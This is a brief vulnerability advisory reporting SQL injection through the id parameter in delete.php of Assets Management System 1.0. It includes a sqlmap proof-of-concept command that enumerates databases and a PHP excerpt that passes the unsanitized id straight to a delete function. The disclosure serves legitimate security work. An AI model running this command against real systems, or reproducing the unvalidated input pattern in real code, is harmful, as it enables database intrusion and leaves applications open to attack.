Description
Assets Management System 1.0 is vulnerable to SQL injection via the id
parameter in delete.php
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch
Code review (delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
There is no validation or sanitization of the $id
variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query